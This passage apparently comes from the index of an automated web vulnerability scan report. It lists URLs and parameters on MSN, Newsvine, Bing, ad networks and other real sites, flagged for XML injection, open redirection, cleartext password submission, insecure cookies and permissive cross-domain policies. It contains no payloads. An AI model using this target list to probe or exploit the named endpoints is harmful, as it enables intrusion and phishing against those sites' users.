6.71. http://pagead2.googlesyndication.com/crossdomain.xml

6.72. http://photobucket.com/crossdomain.xml

6.73. http://player.ooyala.com/crossdomain.xml

6.74. http://rachel.msnbc.com/crossdomain.xml

6.75. http://redtape.newsvine.com/crossdomain.xml

6.76. http://static.ak.fbcdn.net/crossdomain.xml

6.77. http://suzanne-choney.newsvine.com/crossdomain.xml

6.78. http://technolog2.newsvine.com/crossdomain.xml

6.79. http://thelastword.msnbc.redacted/crossdomain.xml

6.80. http://today.msnbc.com/crossdomain.xml

6.81. http://toddkenreck.newsvine.com/crossdomain.xml

6.82. http://top.newsvine.com/crossdomain.xml

6.83. http://tv.msnbc.com/crossdomain.xml

6.84. http://wbenedetti.newsvine.com/crossdomain.xml

6.85. http://www.adobe.com/crossdomain.xml

6.86. http://www.amazon.com/crossdomain.xml

6.87. http://www.blackvoices.com/crossdomain.xml

6.88. http://www.dooce.com/crossdomain.xml

6.89. http://www.habitablezone.com/crossdomain.xml

6.90. http://www.hoovers.com/crossdomain.xml

6.91. http://www.msnbc.com/crossdomain.xml

6.92. https://www.newsvine.com/crossdomain.xml

6.93. http://www.polls.newsvine.com/crossdomain.xml

6.94. http://www.popularmechanics.com/crossdomain.xml

6.95. http://www.reuters.com/crossdomain.xml

6.96. http://www.signonsandiego.com/crossdomain.xml

6.97. http://www.tigerdirect.com/crossdomain.xml

6.98. http://www.walmart.com/crossdomain.xml

6.99. http://www.zacks.com/crossdomain.xml

6.100. http://advertising.redacted/crossdomain.xml

6.101. http://articles.redacted/crossdomain.xml

6.102. http://seedmagazine.com/crossdomain.xml

6.103. https://twitter.com/crossdomain.xml

6.104. http://www.livescience.com/crossdomain.xml

6.105. http://www.twitter.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.ae.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.rad.redacted/clientaccesspolicy.xml

7.3. http://b.voicefive.com/clientaccesspolicy.xml

7.4. http://ec.redcated/clientaccesspolicy.xml

7.5. http://jp.video.redacted/clientaccesspolicy.xml

7.6. http://latino.aol.com/clientaccesspolicy.xml

7.7. http://latino.video.redacted/clientaccesspolicy.xml

7.8. http://netscape.aol.com/clientaccesspolicy.xml

7.9. http://ninemsn.video.redacted/clientaccesspolicy.xml

7.10. http://s0.2mdn.net/clientaccesspolicy.xml

7.11. http://wrapper.g.redacted/clientaccesspolicy.xml

7.12. http://www.ticketcity.com/clientaccesspolicy.xml

7.13. http://blstj.redacted/clientaccesspolicy.xml

7.14. http://dateline.msnbc.com/clientaccesspolicy.xml

7.15. http://explore.live.com/clientaccesspolicy.xml

7.16. http://hardball.msnbc.com/clientaccesspolicy.xml

7.17. http://msnbc.com/clientaccesspolicy.xml

7.18. http://msnbcmedia.redacted/clientaccesspolicy.xml

7.19. http://mtp.msnbc.com/clientaccesspolicy.xml

7.20. http://nbcsports.msnbc.com/clientaccesspolicy.xml

7.21. http://nightly.msnbc.com/clientaccesspolicy.xml

7.22. http://rachel.msnbc.com/clientaccesspolicy.xml

7.23. http://today.msnbc.com/clientaccesspolicy.xml

7.24. http://tv.msnbc.com/clientaccesspolicy.xml

7.25. http://www.msnbc.com/clientaccesspolicy.xml

7.26. http://services.money.redacted/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://digg.com/search

8.2. http://eurekalert.org/

8.3. http://msn.chemistry.com/cp/landing/44762

8.4. http://msn.chemistry.com/cp/landing/57269

8.5. http://spacefellowship.com/

8.6. http://www.dailygrail.com/

8.7. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

8.8. http://www.polls.newsvine.com/_vine/js/m1/vine.js

8.9. http://www.scientificamerican.com/blog/observations/

8.10. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

8.11. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

8.12. http://www.unmannedspaceflight.com/

8.13. http://www.zacks.com/

9. XML injection

9.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [REST URL parameter 1]

9.2. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 1]

9.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

9.4. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

9.5. http://beacon.jump-time.net/jt.js [REST URL parameter 1]

9.6. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [format parameter]

9.7. http://cdn-forums.scout.com/adfeed.ashx [format parameter]

9.8. http://edge.quantserve.com/quant.js [REST URL parameter 1]

9.9. http://forums.silverlight.net/user/viewonline.aspx [CSAnonymous cookie]

9.10. http://forums.silverlight.net/user/viewonline.aspx [CommunityServer-LastVisitUpdated-2101 cookie]

9.11. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]

9.12. http://forums.silverlight.net/user/viewonline.aspx [s_sq cookie]

9.13. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [allowEmptySearch parameter]

9.14. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [appid parameter]

9.15. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [focusOnInit parameter]

9.16. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [minimumTermLength parameter]

9.17. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [overrideWatermark parameter]

9.18. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [scopeid parameter]

9.19. http://img.widgets.video.s-redacted/resource.aspx [responseEncoding parameter]

9.20. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

9.21. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.22. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.23. https://security.live.com/LoginStage.aspx [lmif parameter]

9.24. http://services.money.redacted/QuoteService/dynamic [format parameter]

9.25. http://services.money.redacted/quoteservice/streaming [format parameter]

9.26. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 1]

9.27. http://srv.admailtiser.com/pix/master_pixel.js [REST URL parameter 2]

10. SSL cookie without secure flag set

10.1. https://careers.microsoft.com/

10.2. https://login.silverlight.net/login/createuser.aspx

10.3. https://login.silverlight.net/login/signin.aspx

10.4. https://secure.opinionlab.com/ccc01/comment_card.asp

10.5. https://secure.opinionlab.com/ccc01/o.asp

10.6. https://secure.opinionlab.com/ccc01/o.asp

10.7. https://security.live.com/LoginStage.aspx

10.8. https://security.live.com/LoginStage.aspx

10.9. https://twitter.com/ToddKenreck

10.10. https://www.msnfeedback.com/perseus/se.ashx

10.11. https://login.live.com/login.srf

10.12. https://login.live.com/pp900/

10.13. https://login.live.com/ppsecure/post.srf

10.14. https://login.live.com/ppsecure/secure.srf

10.15. https://login.live.com/resetpw.srf

10.16. https://msnia.login.live.com/ppsecure/post.srf

10.17. https://sb.voicefive.com/b

10.18. https://www.newsvine.com/

10.19. https://www.newsvine.com/_action/user/logout

10.20. https://www.newsvine.com/_nv/accounts/global/information

10.21. https://www.newsvine.com/_nv/accounts/login

10.22. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

10.23. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

10.24. https://www.newsvine.com/_nv/accounts/register

10.25. https://www.newsvine.com/_nv/api/accounts/login

10.26. https://www.newsvine.com/_nv/api/accounts/resetPassword

11. Session token in URL

11.1. http://clk.redcated/go/286026710/direct

11.2. http://cosmiclog.msnbc.redacted/

11.3. http://local.redacted/

11.4. http://local.redacted/gas-traffic.aspx

11.5. http://local.redacted/hourly.aspx

11.6. http://local.redacted/movies-events.aspx

11.7. http://local.redacted/news.aspx

11.8. http://local.redacted/restaurants.aspx

11.9. http://local.redacted/sports.aspx

11.10. http://local.redacted/ten-day.aspx

11.11. http://local.redacted/weather.aspx

11.12. http://stackauth.com/auth/global/read

11.13. http://thelastword.msnbc.redacted/

11.14. http://www.amazon.com/gp/product/0470650923

11.15. http://www.amazon.com/gp/product/0672333368

11.16. http://www.amazon.com/gp/product/0981511821

11.17. http://www.amazon.com/gp/product/184968006X

11.18. http://www.amazon.com/gp/product/1935182374

11.19. http://www.facebook.com/extern/login_status.php

11.20. http://www.redacted/scp/AuthServiceTwitter.aspx

11.21. http://www.thespacereview.com/

12. SSL certificate

12.1. https://signup.live.com/

12.2. https://www.msnfeedback.com/

12.3. https://www.newsvine.com/

12.4. https://secure.scout.com/

12.5. https://secure.shared.live.com/

12.6. https://secure.wlxrs.com/

12.7. https://security.live.com/

12.8. https://twitter.com/

13. Password field submitted using GET method

13.1. http://digg.com/search

13.2. http://www.scientificamerican.com/blog/observations/

13.3. http://www.scientificamerican.com/errors/404.cfm

14. ASP.NET ViewState without MAC enabled

14.1. http://beta-ads.ace.advertising.com/

14.2. http://college.scout.com/

14.3. http://content.scout.com/a.z

14.4. http://jcfootball.scout.com/

14.5. http://mlb.scout.com/

14.6. http://p.ace.advertising.com/

14.7. http://preps.scout.com/

14.8. http://r1-ads.ace.advertising.com/

14.9. http://r1.ace.advertising.com/

14.10. http://recruiting.scout.com/a.z

14.11. http://rss.scout.com/rss.aspx

14.12. https://secure.scout.com/a.z

14.13. http://www.scout.com/

14.14. http://www.scout.com/3/college-links.html

14.15. http://www.scout.com/3/company.html

14.16. http://www.scout.com/3/fair-use.html

14.17. http://www.scout.com/3/jobs.html

14.18. http://www.scout.com/3/privacy-policy.html

14.19. http://www.scout.com/3/recruiting-links.html

14.20. http://www.scout.com/3/security-information.html

14.21. http://www.scout.com/3/terms-of-service.html

14.22. http://www.scout.com/a.z

14.23. http://www.scout.com/search.aspx

14.24. http://www.scout.com/widgets/

15. Open redirection

15.1. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

15.2. http://developer.windowsphone.com/ [name of an arbitrarily supplied request parameter]

15.3. http://go.microsoft.com/fwlink/ [name of an arbitrarily supplied request parameter]

15.4. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

15.5. http://jp.video.redacted/ [name of an arbitrarily supplied request parameter]

15.6. http://latino.video.redacted/ [name of an arbitrarily supplied request parameter]

15.7. http://ninemsn.video.redacted/ [name of an arbitrarily supplied request parameter]

15.8. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]

15.9. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 [trg parameter]

15.10. http://video.fr.sympatico.redacted/ [name of an arbitrarily supplied request parameter]

15.11. http://video.sympatico.redacted/ [name of an arbitrarily supplied request parameter]

16. Cookie scoped to parent domain

16.1. http://c.microsoft.com/trans_pixel.aspx

16.2. http://msn.whitepages.com/

16.3. http://silverlight.codeplex.com/

16.4. http://t.mookie1.com/t/v1/imp

16.5. http://www.amazon.com/gp/product/0470650923

16.6. http://www.amazon.com/gp/product/0672333368

16.7. http://www.amazon.com/gp/product/0981511821

16.8. http://www.amazon.com/gp/product/184968006X

16.9. http://www.amazon.com/gp/product/1935182374

16.10. http://www.bing.com/travel/

16.11. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

16.12. http://www.bing.com/travel/deals/last-minute-flight-deals.do

16.13. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

16.14. http://www.bing.com/travel/hotels

16.15. http://www.dailygrail.com/

16.16. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

16.17. http://www.kanoodle.com/

16.18. http://www.kanoodle.com/ajax/search_spy_data.html

16.19. http://www.kanoodle.com/ajax/search_spy_data_today.html

16.20. http://www.kanoodle.com/search_spy.html

16.21. http://www.opensource.org/licenses/gpl-license.php

16.22. http://www.opensource.org/licenses/mit-license.php

16.23. http://www.popsci.com/

16.24. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

16.25. http://www.zacks.com/

16.26. http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227

16.27. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

16.28. http://ad.doubleclick.net/click

16.29. http://ad.doubleclick.net/clk

16.30. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308

16.31. http://add.my.yahoo.com/rss

16.32. http://ads.revsci.net/adserver/ako

16.33. http://alex-johnson.newsvine.com/

16.34. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

16.35. http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php

16.36. http://ar.voicefive.com/b/wc_beacon.pli

16.37. http://ar.voicefive.com/bmx3/broker.pli

16.38. http://articles.redacted/news/news.aspx

16.39. http://athima-chansanchai.newsvine.com/

16.40. http://b.rad.redacted/ADSAdClient31.dll

16.41. http://b.scorecardresearch.com/b

16.42. http://b.scorecardresearch.com/r

16.43. http://b.voicefive.com/b

16.44. http://boyle.newsvine.com/

16.45. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.46. http://c.redcated/c.gif

16.47. http://c.bing.com/c.gif

16.48. http://c.redacted/c.gif

16.49. http://c.statcounter.com/t.php

16.50. http://calendar.live.com/calendar/calendar.aspx

16.51. http://careers.redacted/

16.52. http://clk.redcated/APM/go/139941180/direct

16.53. http://clk.redcated/APM/go/148848786/direct

16.54. http://clk.redcated/BEL/go/262582811/direct

16.55. http://clk.redcated/CNT/go/286609711/direct

16.56. http://clk.redcated/CNT/go/287065754/direct

16.57. http://clk.redcated/CNT/go/299297287/direct

16.58. http://clk.redcated/NFX/go/297941249/direct/01/

16.59. http://clk.redcated/ULA/go/296652509/direct

16.60. http://clk.redcated/go/286026710/direct

16.61. http://clk.redcated/go/286609711/direct

16.62. http://clk.redcated/go/287065754/direct

16.63. http://clk.redcated/go/296652509/direct

16.64. http://clk.redcated/goiframe/184054348/262582811/direct/01

16.65. http://clk.redcated/goiframe/199711109/299297287/direct

16.66. http://context3.kanoodle.com/cgi-bin/context.cgi

16.67. http://conveu.admailtiser.com/st

16.68. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js

16.69. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

16.70. http://deals.redacted/

16.71. http://dg.specificclick.net/

16.72. http://editorial.autos.redacted/article.aspx

16.73. http://editorial.autos.redacted/articles/default.aspx

16.74. http://editorial.autos.redacted/blogs/autosblog.aspx

16.75. http://editorial.autos.redacted/media/default.aspx

16.76. http://editorial.autos.redacted/media/video/default.aspx

16.77. http://editorial.autos.redacted/new-cars/default.aspx

16.78. http://editorial.autos.redacted/slideshow.aspx

16.79. http://editorial.autos.redacted/used-cars/default.aspx

16.80. http://entertainment.redacted/

16.81. http://entertainment.redacted/news/

16.82. http://entertainment.redacted/video/

16.83. http://expression.microsoft.com/en-us/cc136530.aspx

16.84. http://health.redacted/

16.85. http://helenaspopkin.newsvine.com/

16.86. http://ib.adnxs.com/getuid

16.87. http://ib.adnxs.com/seg

16.88. http://ingame.newsvine.com/

16.89. http://js.revsci.net/gateway/gw.js

16.90. http://latino.redacted/

16.91. http://leadback.advertising.com/adcedge/lb

16.92. http://lifestyle.redacted/

16.93. http://lifestyle.redacted/relationships/

16.94. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

16.95. http://lifestyle.redacted/your-home/

16.96. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

16.97. http://lifestyle.redacted/your-life/family-parenting/article.aspx

16.98. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

16.99. http://lifestyle.redacted/your-life/your-money-today/article.aspx

16.100. http://lifestyle.redacted/your-life/your-money-today/video.aspx

16.101. http://lifestyle.redacted/your-look/

16.102. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

16.103. http://lifestyle.redacted/your-look/video/

16.104. http://live.newsvine.com/

16.105. http://local.redacted/

16.106. http://local.redacted/events.aspx

16.107. http://local.redacted/gas-traffic.aspx

16.108. http://local.redacted/hourly.aspx

16.109. http://local.redacted/movies-events.aspx

16.110. http://local.redacted/news.aspx

16.111. http://local.redacted/restaurants.aspx

16.112. http://local.redacted/sports.aspx

16.113. http://local.redacted/ten-day.aspx

16.114. http://local.redacted/weather.aspx

16.115. http://media.fastclick.net/w/tre

16.116. http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

16.117. http://michaelwann.newsvine.com/

16.118. http://money.redacted/auto-insurance/article.aspx

16.119. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

16.120. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

16.121. http://money.redacted/identity-theft/default-dyn.aspx

16.122. http://money.redacted/market-news/post.aspx

16.123. http://money.redacted/mutual-fund/default-dyn.aspx

16.124. http://money.redacted/saving-money/50-30-20-budget.aspx

16.125. http://redacted/

16.126. http://redacted/detail/stock_quote

16.127. http://redacted/inc/Attributions.asp

16.128. http://redacted/personal-finance/

16.129. http://movies.redacted/

16.130. http://movies.redacted/academy-awards/snubs/

16.131. http://movies.redacted/jason-statham/photo-gallery/feature/

16.132. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

16.133. http://movies.redacted/new-on-dvd/movies/

16.134. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

16.135. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

16.136. http://movies.redacted/showtimes/showtimes.aspx

16.137. http://movies.redacted/the-rundown/the-guard/story_5/

16.138. http://msdn.microsoft.com/

16.139. http://msdn.microsoft.com/en-us/library/cc838158(VS.95

16.140. http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx

16.141. http://msdn.microsoft.com/en-us/library/ff637515(VS.92

16.142. http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx

16.143. http://msn.careerbuilder.com/

16.144. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

16.145. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

16.146. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

16.147. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

16.148. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx

16.149. http://msn.careerbuilder.com/msn/default.aspx

16.150. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

16.151. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

16.152. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

16.153. https://msnia.login.live.com/ppsecure/post.srf

16.154. http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}

16.155. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

16.156. http://music.redacted/

16.157. http://my.live.com/

16.158. http://my.redacted/

16.159. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

16.160. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

16.161. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

16.162. http://onlinehelp.microsoft.com/en-us/msn/money.aspx

16.163. http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx

16.164. http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx

16.165. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

16.166. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js

16.167. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

16.168. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

16.169. http://pix04.revsci.net/D08734/a1/0/0/0.gif

16.170. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

16.171. http://ptsd.eyewonder.com/ewr

16.172. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

16.173. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

16.174. http://r1-ads.ace.advertising.com/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

16.175. http://realestate.redacted/

16.176. http://realestate.redacted/OmRedir.aspx

16.177. http://realestate.redacted/article.aspx

16.178. http://realestate.redacted/slideshow.aspx

16.179. http://redtape.newsvine.com/

16.180. https://sb.voicefive.com/b

16.181. http://search.redacted/

16.182. https://security.live.com/LoginStage.aspx

16.183. https://security.live.com/LoginStage.aspx

16.184. http://seg.admailtiser.com/st

16.185. https://signup.live.com/signup.aspx

16.186. https://signup.live.com/signup.aspx

16.187. http://social.entertainment.redacted/bloglist.aspx

16.188. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

16.189. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

16.190. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

16.191. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads

16.192. http://specials.redacted/

16.193. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

16.194. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

16.195. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

16.196. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

16.197. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

16.198. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

16.199. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

16.200. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

16.201. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

16.202. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

16.203. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

16.204. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

16.205. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

16.206. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

16.207. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

16.208. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

16.209. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

16.210. http://specials.redacted/IEIncreaseFont_preview.aspx

16.211. http://specials.redacted/alphabet.aspx

16.212. http://suzanne-choney.newsvine.com/

16.213. http://technolog2.newsvine.com/

16.214. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

16.215. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

16.216. http://toddkenreck.newsvine.com/

16.217. http://top.newsvine.com/

16.218. http://top.newsvine.com/users

16.219. http://tv.redacted/

16.220. http://tv.redacted/tv/article.aspx

16.221. http://us.mc1125.mail.yahoo.com/mc/compose

16.222. http://redcated/CNT/iview/299297287/direct

16.223. http://wbenedetti.newsvine.com/

16.224. http://www.bing.com/

16.225. http://www.bing.com/challenge

16.226. http://www.bing.com/events/search

16.227. http://www.bing.com/fd/ls/GLinkPing.aspx

16.228. http://www.bing.com/fd/ls/l

16.229. http://www.bing.com/finance/stockscreener

16.230. http://www.bing.com/images/results.aspx

16.231. http://www.bing.com/local/ypdefault.aspx

16.232. http://www.bing.com/maps/

16.233. http://www.bing.com/maps/default.aspx

16.234. http://www.bing.com/maps/explore/

16.235. http://www.bing.com/msnhomepagehistory.aspx

16.236. http://www.bing.com/news/results.aspx

16.237. http://www.bing.com/news/search

16.238. http://www.bing.com/news/search

16.239. http://www.bing.com/results.aspx

16.240. http://www.bing.com/sck

16.241. http://www.bing.com/search

16.242. http://www.bing.com/search

16.243. http://www.bing.com/search/

16.244. http://www.bing.com/shopping

16.245. http://www.bing.com/shopping/bird-feeders/search

16.246. http://www.bing.com/shopping/content/search

16.247. http://www.bing.com/shopping/healthy-cooking/r/151

16.248. http://www.bing.com/shopping/makeup/c/4259

16.249. http://www.bing.com/shopping/search

16.250. http://www.bing.com/shopping/swimwear/c/4503

16.251. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

16.252. http://www.bing.com/travel/content/search

16.253. http://www.bing.com/videos/browse

16.254. http://www.bing.com/videos/results.aspx

16.255. http://www.bing.com/videos/results.aspx

16.256. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

16.257. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

16.258. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

16.259. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

16.260. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

16.261. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

16.262. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

16.263. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

16.264. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

16.265. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

16.266. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

16.267. http://www.facebook.com/2008/fbml

16.268. http://www.facebook.com/HelenASPopkin

16.269. http://www.facebook.com/campaign/impression.php

16.270. http://www.facebook.com/sharer.php

16.271. http://www.facebook.com/todd.kenreck

16.272. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

16.273. http://www.iis.net/

16.274. http://www.live.com/

16.275. http://www.morningstar.com/

16.276. http://www.redacted/

16.277. http://www.msnbc.redacted/

16.278. http://www.msnbc.redacted/id/8004316/

16.279. http://www.newsvine.com/

16.280. http://www.newsvine.com/_action/article/emailThis

16.281. http://www.newsvine.com/_action/user/logout

16.282. http://www.newsvine.com/_action/user/startTracking

16.283. http://www.newsvine.com/_action/user/stopTracking

16.284. http://www.newsvine.com/_api/comments/getComments

16.285. http://www.newsvine.com/_api/question/getUserData

16.286. http://www.newsvine.com/_api/user/convTracker

16.287. http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts

16.288. http://www.newsvine.com/_nv/api/accounts/login

16.289. http://www.newsvine.com/_tools/user/login

16.290. http://www.newsvine.com/_vine/js/m1/global.js

16.291. https://www.newsvine.com/

16.292. https://www.newsvine.com/_action/user/logout

16.293. https://www.newsvine.com/_nv/accounts/global/information

16.294. https://www.newsvine.com/_nv/accounts/login

16.295. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

16.296. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

16.297. https://www.newsvine.com/_nv/accounts/register

16.298. https://www.newsvine.com/_nv/api/accounts/login

16.299. https://www.newsvine.com/_nv/api/accounts/resetPassword

16.300. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

16.301. http://www.youtube.com/embed/CKZzn00w01M

16.302. http://www.youtube.com/embed/mm8byzo8zWE

17. Cookie without HttpOnly flag set

17.1. http://advertising.aol.com/privacy/advertisingcom/opt-out

17.2. http://c.microsoft.com/trans_pixel.aspx

17.3. https://careers.microsoft.com/

17.4. http://ccc01.opinionlab.com/o.asp

17.5. http://ccc01.opinionlab.com/o.asp

17.6. http://ccc01.opinionlab.com/o.asp

17.7. http://dating.redacted/cp.aspx

17.8. http://dating.redacted/en-us/partner/msn/38028.html

17.9. http://dating.redacted/index.aspx

17.10. http://dating.redacted/search/index.aspx

17.11. http://games.redacted/

17.12. http://malexj.tk/6M

17.13. http://msn.chemistry.com/cp/landing/44762

17.14. http://msn.chemistry.com/cp/landing/57269

17.15. http://msn.foxsports.com/video

17.16. http://msn.whitepages.com/

